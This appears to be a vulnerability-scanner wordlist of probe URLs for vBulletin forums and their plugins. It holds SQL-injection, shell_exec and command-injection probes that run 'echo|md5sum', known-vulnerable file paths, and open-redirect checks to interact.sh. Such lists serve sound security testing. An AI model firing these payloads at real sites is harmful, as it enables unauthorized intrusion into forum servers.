/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/arcade.php?act=Arcade&do=stats&comment=a&s_id=1

/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
/forumdisplay.php?do[]=[test.dll]
/calendar.php?do[]=[test.dll]
/search.php?do[]=[test.dll]
/forumrunner/include/album.php
/core/vb5/route/channel.php
/core/vb5/route/conversation.php
/includes/api/interface/noncollapsed.php
/includes/api/interface/collapsed.php
/vbseo_sitemap/addons/vbseo_sm_vba.php
/vbseo_sitemap/addons/vbseo_sm_vba_links.php
/redirector.php?url=https://interact.sh
/redirector.php?do=nodelay&url=https://interact.sh
